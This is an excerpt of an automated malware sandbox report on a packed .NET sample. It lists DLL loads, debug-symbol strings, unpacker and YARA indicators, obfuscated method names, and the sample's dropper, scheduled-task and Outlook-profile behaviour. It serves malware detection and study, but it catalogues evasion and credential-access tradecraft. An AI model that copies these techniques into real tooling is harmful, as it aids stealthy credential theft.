Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\aWBoUwiux.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Source: LEmJJ87mUQ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: LEmJJ87mUQ.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: LEmJJ87mUQ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Accessibility.pdbh source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: Accessibility.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbT^ source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\exe\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2395185499.0000000000BA2000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: n(C:\Windows\zdr.pdb5 source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: symbols\exe\zdr.pdb30&n source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: ?&nC:\Users\user\AppData\Roaming\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: zdr.pdb source: LEmJJ87mUQ.exe, aWBoUwiux.exe.0.dr, WERB83E.tmp.dmp.16.dr
Source:	Binary string: C:\Windows\zdr.pdbpdbzdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: zdr.pdbws\zdr.pdbpdbzdr.pdb\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\exe\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb( source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: @&n.pdb source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: System.ni.pdbRSDS source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: RegSvcs.pdb, source: RegSvcs.exe, 00000008.00000002.2395185499.0000000000BA2000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: zdr.pdbZ source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\zdr.pdb= source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: aWBoUwiux.exe, 00000009.00000002.2501621888.0000000000AC3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb(G source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\zdr.pdbM source: aWBoUwiux.exe, 00000009.00000002.2501621888.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp, WERB83E.tmp.dmp.16.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp, WERB83E.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\dll\System.pdbZ~ source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2501621888.0000000000B1B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\zdr.pdb source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: System.pdb$(,048 source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: zdr.pdbSHA256T` source: LEmJJ87mUQ.exe, aWBoUwiux.exe.0.dr
Source:	Binary string: .pdb source: aWBoUwiux.exe, 00000009.00000002.2501437622.0000000000987000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Roaming\aWBoUwiux.PDB source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdbu source: aWBoUwiux.exe, 00000009.00000002.2507494471.0000000006CE4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WERB83E.tmp.dmp.16.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERB83E.tmp.dmp.16.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: LEmJJ87mUQ.exe, Form1.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: aWBoUwiux.exe.0.dr, Form1.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, s2abX12Byym4oB7iuy.cs	.Net Code: TWCuarf0jj System.Reflection.Assembly.Load(byte[])
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, s2abX12Byym4oB7iuy.cs	.Net Code: TWCuarf0jj System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 9.2.aWBoUwiux.exe.39c9ed8.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.aWBoUwiux.exe.39c9ed8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LEmJJ87mUQ.exe.4249108.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LEmJJ87mUQ.exe.4263128.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LEmJJ87mUQ.exe.4263128.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.aWBoUwiux.exe.39e3ef8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.LEmJJ87mUQ.exe.4249108.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.aWBoUwiux.exe.39e3ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2347808139.0000000004249000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2504828444.00000000039E3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2347808139.0000000004263000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2504828444.00000000039C9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2395006402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2347063114.0000000003181000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: LEmJJ87mUQ.exe PID: 5016, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aWBoUwiux.exe PID: 5572, type: MEMORYSTR

Source: LEmJJ87mUQ.exe

Static PE information: 0x85E3D10F [Thu Mar 7 20:11:59 2041 UTC]

Source: C:\Users\user\Desktop\LEmJJ87mUQ.exe	Code function: 0_2_056A6E41 push 3805AC04h; iretd	0_2_056A6E4D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00402AC0 push eax; ret	8_2_00402AD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_00402AC0 push eax; ret	8_2_00402AFC

Source: LEmJJ87mUQ.exe	Static PE information: section name: .text entropy: 7.647162115963495
Source: aWBoUwiux.exe.0.dr	Static PE information: section name: .text entropy: 7.647162115963495

Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, veJXLfyoHmFXwtyvub.cs	High entropy of concatenated method names: 'v8iwVHekCX', 'pcYw6nNUs6', 'Wkjwa4EbFU', 'gjkwOPgOWD', 'LdMw8caS8G', 'wFYwxx5HIN', 'd0gwKBoPIF', 'CsgwrOoNjR', 'b1Iwp8kVOd', 'Tu0w9A8H3f'
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, krOEoKdZ175xes5hVvW.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rPvLqvrPid', 'ntfLMLLDIF', 'XDxL307qQx', 'k6kLhYJS0L', 'UsfLFdbQFo', 'NdDLibuQZY', 'tOBLJPGp24'
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, BWVXhLFpxwXuIlrnqD.cs	High entropy of concatenated method names: 'TjNQ4v6gLJ', 'u46QAoLR4P', 'LC7QqZZx1I', 'DRIQMe94kB', 'BMHQNIMUMZ', 'vbGQDnNloO', 'F1KQtogPCA', 'TopQZ18G0k', 'OppQ5g2sfD', 'i2LQ1FINK5'
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, uCAHc2H8uPvOyq91xE.cs	High entropy of concatenated method names: 'o3fSY4bSR8', 'bhNSEBFh6c', 'LB3Semm0Tx', 'x1gSgMJG29', 'GSqS2oRr0a', 'JqHSwTTjRG', 'WPsSB871YT', 'pGfSPy8cF3', 'HsZSWhIjYi', 'ksPSk6AQac'
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, rd0AEsXn1MeCQ1jiLQ.cs	High entropy of concatenated method names: 'aS42fUPb52', 'qbE2E7HHu5', 'hJ52g5x2jC', 'jTk2wCJV7K', 'pjw2BRcKSD', 'Y93gFsdq8Z', 'MY9giDCH2r', 'VgkgJC0Q0U', 'oGBgjIUmQZ', 'mgcgUaGysY'
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, LKw1V4s2PCsbLttJoI.cs	High entropy of concatenated method names: 'yFEorGbiCC', 'EIWopFsXGC', 'AAhoHNgkDB', 'JtAoNU42UR', 'e4noteBeim', 'GgVoZE2lMq', 'HCCo1TKYms', 'Gr3o7fAqii', 'Smoo4fJHPv', 'hmso0FfSBG'
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, s2abX12Byym4oB7iuy.cs	High entropy of concatenated method names: 'pO5nfPdrm3', 'RvLnY7TQW0', 'dtDnErmiG3', 'xXyner8l7g', 'YHRngQgLdq', 'Jsfn2kuRuV', 'LxDnwgb7qN', 'e6HnB9TkJm', 'YBPnPsZs6f', 'rqjnWnSQ6g'
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, xlb0mPuHJiDuJuLogE.cs	High entropy of concatenated method names: 'eL8Ij6aa0e', 'LdiIbm6BZf', 'JlkSCgAffZ', 'SbrSGqBxSv', 'D2II0xmKhq', 'ADOIAPihVD', 'Hv8IcP0Xyf', 'JsTIqlbICQ', 'LtJIMsxH5N', 'yy7I3SW0nj'
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, rG3ivKtFPkYayP4877.cs	High entropy of concatenated method names: 'AoNGwLuRdD', 'hsBGBEdKiK', 'j0nGWiYtI0', 'j6vGkuowhD', 'xN4GQRiqDs', 'duVGl4iTar', 'fE7ucvxtdWqVihhuLs', 'IZOHK7TQAB2X6nA8pB', 'Et6GGkrE1i', 'JE2Gnt5Lqf'
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, a5vw6tPu7hcEKmEZZy.cs	High entropy of concatenated method names: 'AQyXGuUct7', 'eKXXno1YE3', 'jmkXu5EYVp', 'TngXYekLJd', 'SK7XEsDhAm', 'AroXgIKx8C', 'HdsX2dpW1v', 'WEHSJF00Bc', 'sH4SjTmHC0', 'WWVSUhmbZi'
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, mKgtOOfgJSjP9ZL2Ml.cs	High entropy of concatenated method names: 'Dispose', 'WfYGUCr3e9', 'MK4RNFTZqv', 'lnQddblWij', 'MZRGbhZh0v', 'TbgGzneQYj', 'ProcessDialogKey', 'MerRCCLPhl', 'I6FRG3loMf', 'nOjRRSPvP4'
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, o4ucp15D8ToPweuH8X.cs	High entropy of concatenated method names: 'hwgeOD2okP', 'f20exe5y19', 'xGherWUjkS', 'uCEepZkEYJ', 'YbbeQYE6Qo', 'LOMel319cj', 'v2meIuOOeB', 'd2heSChUpL', 'om1eXnQlUN', 'buneLNxtDb'
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, vA0utDi6kalJK77o62.cs	High entropy of concatenated method names: 'ToString', 'cSDl0UZLXc', 'hVQlNLVKCI', 'TCNlDyPZUG', 'YdBlthYikk', 'HBdlZjyvfE', 'VZGl5NhByM', 'wFPl1RyHoD', 'gq0l7dQc0P', 'EQ4lsBXL09'
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, I6XRnF4LP5JevZQ7NP.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'DA3RUPx6w4', 'VkPRbn50ij', 'L8eRzc3lam', 'kvunCGZE4v', 'rYwnGLdZBa', 'cnxnRlLJDX', 'zV5nn7A8dQ', 'a9BSgTji8UAfUhgACWL'
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, L8Zd5QMXQQ43AtbYpO.cs	High entropy of concatenated method names: 'D3ZEqRT6BP', 'J9LEMyZaUn', 'AgOE3sNYTF', 'JjCEhLtQhP', 'RtmEFgBCGR', 'K8PEisHiMu', 'Mf7EJQrhjk', 'VwtEjWbPVM', 'G4IEUCZx04', 'BiQEbCPrMM'
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, LST1w7z1Z4AxPZ1MSI.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Oj4XoQ1TjF', 'XrVXQrsHbo', 'PudXlvSAed', 'Vn1XI8csdt', 'CpCXST1tvk', 'o85XXt8OAB', 'gwlXLIob3U'
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, TckNgadhVo6yQFljfHj.cs	High entropy of concatenated method names: 'MYkXVPBTOF', 'LyIX6RIy8J', 'QY8XaTnuZ6', 'YsBXObsSe0', 'RWsX8jwIxv', 'MePXxJVXXk', 'eeWXKrDVU7', 'S33Xr1R8qo', 'wBBXpMTWdY', 'nXiX9ID3rb'
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, ljk4duRsWmsI2jrfts.cs	High entropy of concatenated method names: 'WtDSHY9gLf', 'sR6SNI6HY1', 'HvjSDRCmwq', 'mPgStVHUJd', 'lGZSqrm0qA', 'xJFSZQgTDI', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, Sjnl6VU2hM4EhJtoFJ.cs	High entropy of concatenated method names: 'S4Bg8dM60o', 'i7IgKhmltw', 'oS0eDycI2q', 'YXIetxxQEE', 'nMweZm7e9V', 'vQye5V2ff3', 'swWe19F8kQ', 'jNie7UxT8R', 'YLbesW52i1', 'fYhe4xfgf6'
Source: 0.2.LEmJJ87mUQ.exe.4306000.2.raw.unpack, lbLTaRxgfXRGqTblEm.cs	High entropy of concatenated method names: 'eNgaMEdkH', 'JpNOOy81i', 'tnOxKGS1O', 'uPqKFxMD4', 'SFtps0bye', 'SA99bPNxE', 'B4qs6Gp6CMr84nYLfh', 'ptymZZCapnEu1aXO3X', 'QVMSrUUun', 'YsiLJIE9t'
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, veJXLfyoHmFXwtyvub.cs	High entropy of concatenated method names: 'v8iwVHekCX', 'pcYw6nNUs6', 'Wkjwa4EbFU', 'gjkwOPgOWD', 'LdMw8caS8G', 'wFYwxx5HIN', 'd0gwKBoPIF', 'CsgwrOoNjR', 'b1Iwp8kVOd', 'Tu0w9A8H3f'
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, krOEoKdZ175xes5hVvW.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'rPvLqvrPid', 'ntfLMLLDIF', 'XDxL307qQx', 'k6kLhYJS0L', 'UsfLFdbQFo', 'NdDLibuQZY', 'tOBLJPGp24'
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, BWVXhLFpxwXuIlrnqD.cs	High entropy of concatenated method names: 'TjNQ4v6gLJ', 'u46QAoLR4P', 'LC7QqZZx1I', 'DRIQMe94kB', 'BMHQNIMUMZ', 'vbGQDnNloO', 'F1KQtogPCA', 'TopQZ18G0k', 'OppQ5g2sfD', 'i2LQ1FINK5'
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, uCAHc2H8uPvOyq91xE.cs	High entropy of concatenated method names: 'o3fSY4bSR8', 'bhNSEBFh6c', 'LB3Semm0Tx', 'x1gSgMJG29', 'GSqS2oRr0a', 'JqHSwTTjRG', 'WPsSB871YT', 'pGfSPy8cF3', 'HsZSWhIjYi', 'ksPSk6AQac'
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, rd0AEsXn1MeCQ1jiLQ.cs	High entropy of concatenated method names: 'aS42fUPb52', 'qbE2E7HHu5', 'hJ52g5x2jC', 'jTk2wCJV7K', 'pjw2BRcKSD', 'Y93gFsdq8Z', 'MY9giDCH2r', 'VgkgJC0Q0U', 'oGBgjIUmQZ', 'mgcgUaGysY'
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, LKw1V4s2PCsbLttJoI.cs	High entropy of concatenated method names: 'yFEorGbiCC', 'EIWopFsXGC', 'AAhoHNgkDB', 'JtAoNU42UR', 'e4noteBeim', 'GgVoZE2lMq', 'HCCo1TKYms', 'Gr3o7fAqii', 'Smoo4fJHPv', 'hmso0FfSBG'
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, s2abX12Byym4oB7iuy.cs	High entropy of concatenated method names: 'pO5nfPdrm3', 'RvLnY7TQW0', 'dtDnErmiG3', 'xXyner8l7g', 'YHRngQgLdq', 'Jsfn2kuRuV', 'LxDnwgb7qN', 'e6HnB9TkJm', 'YBPnPsZs6f', 'rqjnWnSQ6g'
Source: 0.2.LEmJJ87mUQ.exe.4361c20.1.raw.unpack, xlb0mPuHJiDuJuLogE.cs	High entropy of concatenated method names: 'eL8Ij6aa0e', 'LdiIbm6BZf', 'JlkSCgAffZ', 'SbrSGqBxSv', 'D2II0xmKhq', 'ADOIAPihVD', 'Hv8IcP0Xyf', 'JsTIqlbICQ', 'LtJIMsxH5N', 'yy7I3SW0nj'
